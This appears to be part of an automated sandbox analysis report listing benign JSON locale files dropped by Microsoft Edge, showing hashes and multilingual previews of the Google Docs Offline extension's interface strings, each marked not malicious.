                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):878
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2766
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):978
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):907
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):914
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):937
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1337
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2846
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):934
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):963
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1320
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):884
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):980
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1941
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1969
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1674
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1063
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
